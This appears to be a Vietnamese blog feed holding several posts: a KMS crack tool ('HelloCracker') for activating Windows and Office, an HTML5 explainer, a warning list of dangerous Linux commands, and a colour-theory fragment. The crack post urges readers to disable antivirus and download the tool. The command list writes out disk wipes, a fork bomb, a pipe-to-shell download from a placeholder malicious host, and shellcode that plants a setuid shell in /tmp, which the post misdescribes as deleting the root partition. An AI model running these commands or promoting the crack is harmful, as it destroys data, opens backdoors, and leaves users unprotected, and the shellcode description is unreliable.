&lt;p&gt;Thông qua nút kích hoạt trên phần mềm, phần mềm sẽ tự động nhập lệnh commadline ( &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;cmd&lt;/code&gt;&lt;/strong&gt; ) kích hoạt key qua một server &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;kms&lt;/code&gt;&lt;/strong&gt; để xác nhận đã kích hoạt Windows 10 và Microsoft Office và sử dụng được 365 ngày, nếu hết hạn bạn có thể thao tác nhấn nút &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;xóa key&lt;/code&gt;&lt;/strong&gt; và kích hoạt lại cho đến khi hết hạn key.&lt;/p&gt;

&lt;p&gt;Vì là phần mềm kích hoạt bằng commadline ( &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;cmd&lt;/code&gt;&lt;/strong&gt; ) thông qua server &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;kms&lt;/code&gt;&lt;/strong&gt; vì thế sẽ hoàn toàn sạch 100% nên các bạn có thể yên tâm về vấn đề &lt;code class=&quot;highlighter-rouge&quot;&gt;nhiễm virus&lt;/code&gt; là không nhá. Tuy nhiên khi kích hoạt bạn vẫn cần cho phép gọi lệnh &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;cmd&lt;/code&gt;&lt;/strong&gt; với quyền admin để kích hoạt nhá.&lt;/p&gt;

&lt;p&gt;Sơ qua phần mềm, thì thao tác đơn giản bạn chỉ cần chọn phiên bản Windows 10 và Microsoft Office để mở khóa nút kích hoạt sau đó chọn đúng phiên bản Windows 10 và Microsoft Office để kích hoạt.&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;500&quot; src=&quot;/image/202061Hellocracker2.PNG&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;1200&quot; src=&quot;/image/HellorCracker3.PNG&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;1200&quot; src=&quot;/image/HellorCracker4.PNG&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;
Nếu AntiVirus của bạn cảnh báo thì hãy tắt nó đi hoặc trước khi tải phần mềm về hãy tắt nó trước nhá.&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;i class=&quot;fas fa-download&quot;&gt;&lt;/i&gt;&lt;a href=&quot;https://www.fshare.vn/file/V18RVUF8JT8E&quot;&gt;Link Download Fshare&lt;/a&gt;&lt;br /&gt;
&lt;i class=&quot;fas fa-download&quot;&gt;&lt;/i&gt;&lt;a href=&quot;https://www.mediafire.com/file/ig62h8626p29a8p/HelloCracker.rar/file&quot;&gt;Link Download Mediafire&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;New Version HelloCrack 1.0.1 beta&lt;/code&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;
&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;1200&quot; src=&quot;/image/HellorCrackerBeta.PNG&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;
&lt;i class=&quot;fab fa-google-drive&quot;&gt;&lt;/i&gt;&lt;a href=&quot;https://drive.google.com/file/d/1Z7BdS-LoEmiLp9TQiduba2ldA6vPxX1h/view?usp=sharing&quot;&gt;Link Download Driver&lt;/a&gt;&lt;br /&gt;
&lt;i class=&quot;fas fa-download&quot;&gt;&lt;a href=&quot;https://www.fshare.vn/file/NWAH9IL7YV9C&quot;&gt;Link Download Fshare&lt;/a&gt;&lt;br /&gt;
&lt;i class=&quot;fas fa-download&quot;&gt;&lt;a href=&quot;https://www.mediafire.com/file/ekghz82ij52d4yc/HelloCrack-1.0.1.rar/file&quot;&gt;Link Download Mediafire&lt;/a&gt;&lt;br /&gt;&lt;/i&gt;&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Cảm ơn các bạn đã xem qua, hãy like và share cho mình có thêm động lực để tổng hợp những phần mềm hữu ích nhá ! ^^&lt;/p&gt;

&lt;hr /&gt;</content><author><name>Panadora</name></author><category term="[&quot;windows&quot;, &quot;new&quot;]" /><summary type="html">Thông qua nút kích hoạt trên phần mềm, phần mềm sẽ tự động nhập lệnh commadline</summary></entry><entry><title type="html">HTML5 là gì, và nó đã làm thay đổi cách chúng ta duyệt web như thế nào?</title><link href="http://localhost:4000/html5-la-gi-hoc-lap-trinh-web-co-ban-den-nang-cao.html" rel="alternate" type="text/html" title="HTML5 là gì, và nó đã làm thay đổi cách chúng ta duyệt web như thế nào?" /><published>2020-05-27T00:00:00+07:00</published><updated>2020-05-27T00:00:00+07:00</updated><id>http://localhost:4000/html5-la-gi-hoc-lap-trinh-web-co-ban-den-nang-cao</id><content type="html" xml:base="http://localhost:4000/html5-la-gi-hoc-lap-trinh-web-co-ban-den-nang-cao.html">&lt;center&gt;
    &lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/hoc-lap-trinh-web-co-ban-truc-tuyen-online-tot-nhat-16032016-1.jpg&quot; /&gt;
&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Trong vài năm qua, bạn có thể đã nghe người ta nói nhiều về HTML5. Cho dù bạn biết mọi thứ về phát triển web hay không, thì khái niệm này có thể hơi mơ hồ và khó hiểu đối với bạn. Rõ ràng, nó là bước tiếp theo trong quá trình phát triển của HTML, nhưng chính xác nó để làm gì? Tại sao lại có quá nhiều sự hào hứng xung quanh nó? Và tại sao nó lại quan trọng đối với bạn?&lt;/p&gt;

&lt;p&gt;HTML hay HyperText Markup Language, là thành phần quan trọng nhất của World Wide Web. Nó là ngôn ngữ dùng để mô tả những gì một trang web hiển thị. Tuy nhiên, nếu chỉ riêng HTML thôi thì khá nhàm chán bởi vì nó chỉ có thể cung cấp các trang web tĩnh; nhằm đáp ứng nhu cầu ngày càng tăng về các tính năng web ấn tượng hơn, HTML đã được kết hợp với các plugin như CSS, Flash, Java, Silverlight, v.v…&lt;/p&gt;

&lt;p&gt;Nó đã trở thành một cái gì đó khá cồng kềnh và các trình duyệt khác nhau thực hiện những tính năng theo cách riêng của chúng. HTML5 sinh ra để giải quyết những vấn đề lớn của HTML, giúp cho trang web trở nên rõ ràng và hiệu quả hơn.&lt;/p&gt;

&lt;p style=&quot;padding-left: 10px; background: #dddd; border: 1px solid #242424; width: 100%; border-radius: 10px;&quot;&gt;
Tại TechMaster có khóa học &lt;a href=&quot;https://techmaster.vn/khoa-hoc/25487/web-co-ban-html5-css3-va-javascript&quot;&gt;&quot;Web cơ bản HTML5, CSS3 và Javascript&quot;&lt;/a&gt; dành cho người mới bắt đầu, chưa học lập trình hoặc cho những ai muốn ôn lại kiến thức căn bản về lập trình web.
&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HTML: Một cái nhìn tổng quan&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HTML như chúng ta biết hiện nay được gọi là HTML4 và nó đã được xuất bản lần đầu vào năm 1997. Vâng, điều đó có nghĩa là chúng ta đã sử dụng HTML4 trong hơn 15 năm nay, và đó là một khoảng thời gian rất dài trong lĩnh vực công nghệ. Khoảng năm 2000, một ngôn ngữ đánh dấu được gọi là XHTML bắt đầu được phát triển song song và nó đã được sử dụng khá tốt trong những năm qua, chủ yếu là do các tiêu chuẩn khắt khe mà nó áp đặt. Nhìn chung, mặc dù, hai ngôn ngữ này là tương tự nhau.&lt;/p&gt;

&lt;center&gt;
    &lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/hoc-lap-trinh-web-co-ban-truc-tuyen-online-tot-nhat-16032016-2.jpg&quot; /&gt;
&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Vấn đề đối với HTML4 là các chức năng của nó rất giới hạn. Nó phải được mở rộng thông qua các plugin như Flash, để cung cấp nhiều tính năng trên text (văn bản) và hình ảnh đơn giản hơn. Ví dụ, nhiều video player đã được tạo ra và duy trì trên nền tảng Flash và nhúng vào các trang HTML. Nhiều ứng dụng web được phát triển sử dụng Java và các applet nhúng vào web.&lt;/p&gt;

&lt;p&gt;Với tất cả các plugin này, nó trở nên khó khăn trong việc duy trì các tiêu chuẩn thích hợp. Lý tưởng nhất, mọi trình duyệt sẽ hiển thị các trang web theo cùng một cách để cung cấp những trải nghiệm tương tự cho mỗi người dùng. Để hiển thị kết quả tương tự trên nhiều trình duyệt, các lập trình viên web thường cần phải thực hiện những sửa chữa nhanh và áp dụng những mẹo vặt trong các phần khác nhau của trang web của họ để thích nghi với các quá trình rendering khác nhau. Điều này sẽ làm cho trang web trở nên cồng kềnh sau một thời gian ngắn.&lt;/p&gt;

&lt;p&gt;Trên một lưu ý thực tế hơn, các trang web yêu cầu các plugin như Flash và Java cuối cùng sẽ sử dụng nhiều CPU và RAM hơn. Bạn đã bao giờ tự hỏi tại sao trình duyệt của mình lại sử dụng quá nhiều tài nguyên của máy tính đến như vậy? Rất nhiều trong số đó có thể xuất phát từ các phần mở rộng HTML. Đây là một trong những lý do tại sao Apple đã không hỗ trợ Flash trên các thiết bị di động của họ (để tiết kiệm pin).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vậy chính xác HTML5 là gì?&lt;/strong&gt;&lt;/p&gt;

&lt;center&gt;
    &lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/hoc-lap-trinh-web-co-ban-truc-tuyen-online-tot-nhat-16032016-3.jpg&quot; /&gt;
&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Cụ thể hơn, HTML5 đã bổ sung thêm rất nhiều các thẻ đánh dấu (markup) mới:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Các thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;header&amp;gt;&lt;/code&gt; và &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;footer&amp;gt;&lt;/code&gt; :&lt;/strong&gt;
giúp bạn tách các phần trên và dưới của các block nội dung. Để có thể sử dụng nhiều lần trên một trang duy nhất.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;article&amp;gt;&lt;/code&gt; :&lt;/strong&gt;
Giúp xác định một phần cụ thể về nội dung, ví dụ, một bài blog hoặc một bình luận của độc giả.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;nav&amp;gt;&lt;/code&gt;:&lt;/strong&gt; 
Để xác định những phần nào được coi là khối điều hướng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;section&amp;gt;&lt;/code&gt; :&lt;/strong&gt; 
Cho phép bạn xác định một phần nội dung nào đó; tương tự như các thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;div&amp;gt;&lt;/code&gt; hiện nay.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Các thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;audio&amp;gt;&lt;/code&gt; và &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;video&amp;gt;&lt;/code&gt; :&lt;/strong&gt;
Để đánh dấu những nội dung bao gồm âm thanh hoặc video.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;canvas&amp;gt;&lt;/code&gt; :&lt;/strong&gt;
Cho phép bạn vẽ đồ họa sử dụng một ngôn ngữ kịch bản riêng biệt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thẻ &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;embed&amp;gt;&lt;/code&gt; :&lt;/strong&gt;
Dùng để nhúng các nội dung hoặc các ứng dụng bên ngoài vào trang web.&lt;/p&gt;

&lt;p&gt;HTML5 cũng bỏ đi một số thẻ: &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;acronym&amp;gt;&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;applet&amp;gt;&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;font&amp;gt;&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;frame&amp;gt;&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;frameset&amp;gt;&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;noframes&amp;gt;&lt;/code&gt;&lt;/strong&gt;, và một số thẻ khác.&lt;/p&gt;

&lt;p&gt;Các tiêu chuẩn đặc tả kỹ thuật đầy đủ cho HTML5 đã được lên kế hoạch hoàn thành từ năm 2014, nhưng HTML5 đã có nhiều tiến bộ đã và nó có thể được sử dụng để thực hiện các tính năng cho đến hiện nay. Các tiêu chuẩn đặc tả kỹ thuật đầy đủ cho HTML5.1 dự kiến ​​sẽ được hoàn thành vào năm 2016.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tại sao HTML5 lại quan trọng đối với bạn&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Là một người sử dụng web, bạn sẽ được hưởng lợi từ HTML5 bởi vì nó đã sửa chữa những vấn đề hay gặp phải trong HTML4. Các trang web sẽ có những tiêu chuẩn web tốt hơn, giúp cho việc hiển thị nội dung hiệu quả hơn và cải thiện hiệu suất. Khi HTML5 được phổ biến trên diện rộng, các trang web sẽ có tốc độ tải nhanh hơn, băng thông sử dụng ít hơn, và tuổi thọ pin của các thiết bị di động sẽ được kéo dài hơn.&lt;/p&gt;

&lt;p&gt;Thêm vào đó, bạn sẽ không cần phải luôn để ý đến các bản cập nhật của các plugin như Flash và Java. Tôi rất ghét việc phải liên tục cập nhật rất nhiều addons và plugins trên nhiều trình duyệt. Và điều gì sẽ xảy ra khi một trong số chúng có phiên bản không phù hợp? Các trang web sẽ ngừng hoạt động và mang lại nhiều nỗi thất vọng. Tất cả điều đó sẽ được giải quyết ngay khi HTML5 trở thành tiêu chuẩn chính.&lt;/p&gt;

&lt;center&gt;
    &lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/hoc-lap-trinh-web-co-ban-truc-tuyen-online-tot-nhat-16032016-4.jpg&quot; /&gt;
&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Nếu bạn chỉ là một người sử dụng web bình thường và bạn không có ý định viết code hoặc tạo ra trang web của riêng mình, thì bạn không cần phải làm bất cứ điều gì để được hưởng những tính năng tuyệt vời của HTML5. Tất cả các trình duyệt phổ biến hiện nay đều đã hỗ trợ HTML5 ở một mức độ nào đó và bạn có thể đã sử dụng nó mà không biết. Chỉ cần giữ cho trình duyệt của mình luôn cập nhật và bạn sẽ cảm nhận được những tính năng mới.&lt;/p&gt;

&lt;p&gt;Và nếu bạn là một nhà phát triển web, HTML5 sẽ làm cho mọi thứ đơn giản và dễ dàng hơn cho bạn. Nếu mọi việc suôn sẻ, bạn sẽ không phải vật lộn với các vấn đề trong thiết kế web như ở phiên bản HTML cũ, vì tất cả các trình duyệt sẽ cần phải tuân thủ cùng một bộ tiêu chuẩn mới.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Kết luận&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HTML5 là tương lai của trình duyệt web và nó chắc chắn sẽ cách mạng hóa cách chúng ta lướt web. Thậm chí dưới những hạn chế của HTML4, các lập trình viên cũng đã tạo ra một số trang web rất tuyệt vời, vì vậy sẽ rất thú vị để xem những gì sắp được thực hiện với các chức năng của HTML5.&lt;/p&gt;

&lt;p&gt;Hy vọng rằng giờ đây bạn đã có thể nhìn thấy HTML5 một cách rõ ràng hơn và biết tại sao nó lại được thổi phồng lên nhiều đến như vậy. Nếu bạn có bất kỳ câu hỏi nào, xin hãy để lại ý kiến trong phần bình luận phía dưới nhé!&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;Nguồn: &lt;a href=&quot;https://techmaster.vn/posts/33804/html5-la-gi-hoc-lap-trinh-web-co-ban-den-nang-cao?fbclid=IwAR06lAmlmuthMOeGKTpoZgLDTOCMJLI02j_ftRBWmUgLqzJHpinSCOGtJw4#toc-html-m-t-c-i-nh-n-t-ng-quan&quot;&gt;techmaster.vn&lt;/a&gt;&lt;/p&gt;</content><author><name>Panadora</name></author><category term="[&quot;html&quot;, &quot;unixlinux&quot;, &quot;windows&quot;]" /><summary type="html">Trong vài năm qua, bạn có thể đã nghe người ta nói nhiều về HTML5...</summary></entry><entry><title type="html">Top các câu lệnh nguy hiểm trên linux ban cần chú ý khi sử dụng</title><link href="http://localhost:4000/top-cac-cau-lenh-nguy-hiem-tren-linux-ban-can-chu-y-khi-su-dung.html" rel="alternate" type="text/html" title="Top các câu lệnh nguy hiểm trên linux ban cần chú ý khi sử dụng" /><published>2020-05-25T00:00:00+07:00</published><updated>2020-05-25T00:00:00+07:00</updated><id>http://localhost:4000/top-cac-cau-lenh-nguy-hiem-tren-linux-ban-can-chu-y-khi-su-dung</id><content type="html" xml:base="http://localhost:4000/top-cac-cau-lenh-nguy-hiem-tren-linux-ban-can-chu-y-khi-su-dung.html">&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; width=&quot;550&quot; src=&quot;http://localhost:4000/image/2020525-Caution-Command-Terminal.png&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Như bạn đã biết, các câu lệnh trong Terminal thực sự rất hữu dụng và giúp cho người sử dụng có thể thao tác cực nhanh mà không cần phải qua GUI rườm rà. Tuy nhiên, nó cũng có nhiều rủi ro nếu như bạn sử dụng nó sai cách hoặc bạn không hề biết bạn đang thực thi câu lệnh có độ nguy hiểm như thế nào đối với hệ thống.&lt;/p&gt;

&lt;p&gt;Bài viết này sẽ sơ lược qua các câu lệnh cực kỳ nguy hiểm cho Linux, nếu các câu lệnh này được thực thi, bạn có thể bị mất toàn bộ dữ liệu trong máy hoặc hệ điều hành sẽ không bao giờ khởi động được nữa.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Xin lưu ý một lần nữa, bài viết này chỉ có tính chất tham khảo, hạn chế hoặc không chạy các câu lệnh bên dưới để tránh tạo rủi ro gây mất mát dữ liệu hoặc hỏng HĐH&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: rm -rf&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Đây là 1 trong những cách nhanh nhất để xoá file và folder, nhưng nếu nhập sai hoặc bạn không hiểu bản chất của câu lệnh này là gì thì sẽ gây ảnh hưởng nặng nề đến hệ thống.&lt;/p&gt;

&lt;p&gt;Một số cách sử dụng câu lệnh này như bên dưới:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;rm &amp;lt;tên file&amp;gt;&lt;/code&gt;&lt;/strong&gt; : xoá file cụ thể.&lt;br /&gt;
&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;rm -r&lt;/code&gt;&lt;/strong&gt; : xoá toàn bộ folder, kể cả folder rỗng.&lt;br /&gt;
&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;rm -f&lt;/code&gt;&lt;/strong&gt; : bắt buộc xóa file (f ở đây là từ force). Lệnh này bỏ qua các tập tin ko tồn tại và sẽ không hiện ra cảnh báo trước khi xoá. (vì là bắt buộc nên xoá các file &lt;strong&gt;write protected&lt;/strong&gt; và &lt;strong&gt;read only&lt;/strong&gt; luôn).&lt;br /&gt;
&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;rm -rf /&lt;/code&gt;&lt;/strong&gt; : buộc xoá tất cả mọi thứ trong folder gốc, kể cả folder được bảo vệ.&lt;br /&gt;
&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;rm -rf *&lt;/code&gt;&lt;/strong&gt; : buộc xoá tất cả mọi thứ trong folder bạn đang làm việc.&lt;br /&gt;
&lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;rm -rf .&lt;/code&gt;&lt;/strong&gt; : buộc xoá tất cả folder hiện tại và sub-folder.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;CÂU LỆNH&amp;gt; &amp;gt;&lt;/code&gt; /dev/sda&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Câu lệnh bên trên sẽ ghi output của &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;CÂU LỆNH&amp;gt;&lt;/code&gt;&lt;/strong&gt; được thực hiện lên ổ cứng (ở đây là /DEV/SDA) và sẽ ghi đè và xóa sổ toàn bộ dữ liệu có sẵn trong đó.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;:(){:|:&amp;amp;};:&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Lệnh này thực chất là 1 quả bom, nó thực thi bằng việc định nghĩa hàm ‘:’ và hàm này tự gọi lại chính nó (đệ quy). Nó sẽ sao chép chính bản thân nó nhiều lần và liên tục, gây tràn bộ nhớ hệ thống, dẫn tới đóng băng hệ thống.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;mv &amp;lt;TÊN FOLDER&amp;gt; /dev/null&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Nếu bạn thực thi lệnh này, nó sẽ di chuyển &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;TÊN FOLDER&amp;gt;&lt;/code&gt;&lt;/strong&gt; đến &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;/dev/null&lt;/code&gt;&lt;/strong&gt;. Mà nơi này chính là một “lỗ đen” đúng nghĩa. Mọi dữ liệu di chuyển đến đây đều biến mất mãi mãi.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;wget http://trang_chua_ma_doc -O- | sh&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Câu lệnh ở trên sẽ tải script từ một trang chữa mã độc và thực thi với lệnh SH&lt;/p&gt;

&lt;p&gt;Hãy chắc chắn bạn tin tưởng với trang web ở trong câu lệnh này, đừng copy, paste và thực thi vô tội vạ các lệnh ở trên mạng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;mkfs.ext3 /dev/sda&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Lệnh này thì sẽ format lại toàn bộ dữ liệu trong ổ cứng, dữ liệu chắn chắn sẽ biến mất hoàn toàn khi thực thi nó.&lt;/p&gt;

&lt;p&gt;Một số câu lệnh tương tự dùng để format ổ cứng (cần quyền sudo)&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;mkfs&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.ext3&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.bfs&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.ext2&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.minix&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.msdos&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.reiserfs&lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;mkfs.vfat&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Riêng mkfs.cramfs tác dụng tương tự như không cần sudo.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh &lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;gt; &amp;lt;FILE&amp;gt;&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Xoá toàn bộ nội dung của &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;&amp;lt;FILE&amp;gt;&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;^foo^bar&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;được sử dụng để chỉnh sửa lệnh chạy trước đó mà không cần phải gõ lại toàn bộ câu lệnh. Nhưng có thể gây rắc rối nếu bạn không kiểm tra kỹ lưỡng thay đổi trong câu lệnh ban đầu.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lệnh: &lt;code class=&quot;highlighter-rouge&quot;&gt;dd if=/dev/random of=/dev/sda&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Câu lệnh trên sẽ xóa sạch ổ cứng và ghi dữ liệu rác vào. Tất nhiên! Hệ thống của bạn sẽ bị hỏng hoàn toàn và khả năng phục hồi gần như = 0&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NHỮNG CÂU LỆNH NGUY HIỂM ĐÃ ĐƯỢC MÃ HOÁ&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Hẳn bạn nghĩ lệnh trên không gây ra vấn đề gì, nhưng không! Lệnh bên trên sẽ xoá phân vùng gốc ổ cứng của bạn.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bạn tuyệt đối không được copy, paste và thực thi một trong các câu lệnh không rõ nguồn gốc từ Internet để tránh những thiệt hại gây ra cho Linux do sự bất cẩn của bản thân mình.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;~~ Bài viết có kham thảo từ các nguồn uy tín ~~
P/s: nếu mình có sai sót gì trong bài viết thì mong các bạn góp ý để mình có thể chỉnh sửa bài viết và hoàn thiện nó một cách tốt nhất nhé :)&lt;/p&gt;

&lt;p&gt;Nguồn: &lt;a href=&quot;https://www.facebook.com/groups/linuxteamvietnam2018/permalink/856171831568486/&quot;&gt;Linux Team Việt Nam (Official Group) Post 1&lt;/a&gt;&lt;br /&gt;
Nguồn: &lt;a href=&quot;https://www.facebook.com/groups/linuxteamvietnam2018/permalink/856981638154172/&quot;&gt;Linux Team Việt Nam (Official Group) Post 2&lt;/a&gt;&lt;/p&gt;

&lt;hr style=&quot;background: #000;&quot; /&gt;</content><author><name>Panadora</name></author><category term="[&quot;unixlinux&quot;, &quot;terminal&quot;]" /><summary type="html">Như bạn đã biết, các câu lệnh trong Terminal thực sự rất hữu dụng và giúp cho người sử dụng có thể thao tác cực nhanh mà không cần phải qua GUI rườm rà.</summary></entry><entry><title type="html">Khái niệm màu sắc trong thiết kế (phần 3)</title><link href="http://localhost:4000/khai-niem-mau-sac-trong-thiet-ke-p3.html" rel="alternate" type="text/html" title="Khái niệm màu sắc trong thiết kế (phần 3)" /><published>2020-05-14T00:00:00+07:00</published><updated>2020-05-14T00:00:00+07:00</updated><id>http://localhost:4000/khai-niem-mau-sac-trong-thiet-ke-p3</id><content type="html" xml:base="http://localhost:4000/khai-niem-mau-sac-trong-thiet-ke-p3.html">&lt;p&gt;Chào các bạn, mình sẽ tiếp tục với series của Khái niệm màu sắc trong thiết kế (phần 3)&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://localhost:4000/image/2020514ColorP3.jpg&quot; alt=&quot;image-title-here&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;hr /&gt;

&lt;h1 style=&quot;text-align: center;&quot;&gt;LAB&lt;/h1&gt;

&lt;p&gt;Lab - viết tắt &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Lightness-Luminance&lt;/code&gt;&lt;/strong&gt; trong đó:&lt;/p&gt;

&lt;p&gt;(L) là trục thẳng đứng, chỉ biểu diễn độ sáng có giá trị từ 0 (#000000) đến 100 (#FFFFFF).&lt;br /&gt;
(-a) đến (a): chứa giá trị màu GREEN - (#00FF00) đến RED + (#FF0000).&lt;br /&gt;
(-b) đến (b): chứa giá trị màu BLUE - (#0000FF) đến YELLOW + (#FFFF00).&lt;/p&gt;

&lt;p&gt;Các thông tin màu được tách ra được dùng trong các filter của Photoshop, không làm ảnh hưởng đến màu sắc trong bức ảnh.&lt;/p&gt;

